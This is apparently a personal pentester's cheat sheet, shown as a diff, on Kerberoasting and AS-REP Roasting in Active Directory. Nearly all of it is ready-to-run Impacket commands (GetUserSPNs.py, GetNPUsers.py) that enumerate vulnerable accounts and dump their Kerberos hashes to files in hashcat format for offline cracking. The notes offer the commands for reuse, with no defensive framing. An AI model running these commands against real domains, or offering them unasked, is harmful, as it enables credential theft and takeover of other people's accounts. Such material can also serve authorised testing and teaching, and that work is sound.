These are some scribbles if I ever need to look up how to exploit Kerberoasting or AS-REP Roasting. I might expand on this later…

 user $ set dc_ip 192.168.1.1

-user $ set regular_ad_user gijsbert
+user $ set regular_user_account gijsbert

 Enum

-Using GetUserSPNs.py from impacket to check for Kerberoastable accounts:
+Using GetUserSPNs.py from Impacket to check for Kerberoastable accounts:

-user $ GetUserSPNs.py {$win_domain}/{$regular_ad_user}
+user $ GetUserSPNs.py {$win_domain}/{$regular_user_account}

 Retrieve Kerberoastable encrypted hashes:

-user $ GetUserSPNs.py {$win_domain}/{$regular_ad_user} -request -outputfile \
+user $ GetUserSPNs.py {$win_domain}/{$regular_user_account} -request -outputfile \

 hashes.spnroast

-Using GetNPUsers.py (also from impacket) to check for AS-REP Roastable accounts:
+Using GetNPUsers.py (also from Impacket) to check for AS-REP Roastable accounts:

-user $ GetNPUsers.py {$win_domain}/{$regular_ad_user}
+user $ GetNPUsers.py {$win_domain}/{$regular_user_account}

 Retrieve AS-REP Roastable encrypted hashes:

-user $ GetNPUsers.py {$win_domain}/{$regular_ad_user} -request -format \
+user $ GetNPUsers.py {$win_domain}/{$regular_user_account} -request -format \

 hashcat -outputfile hashes.asreproast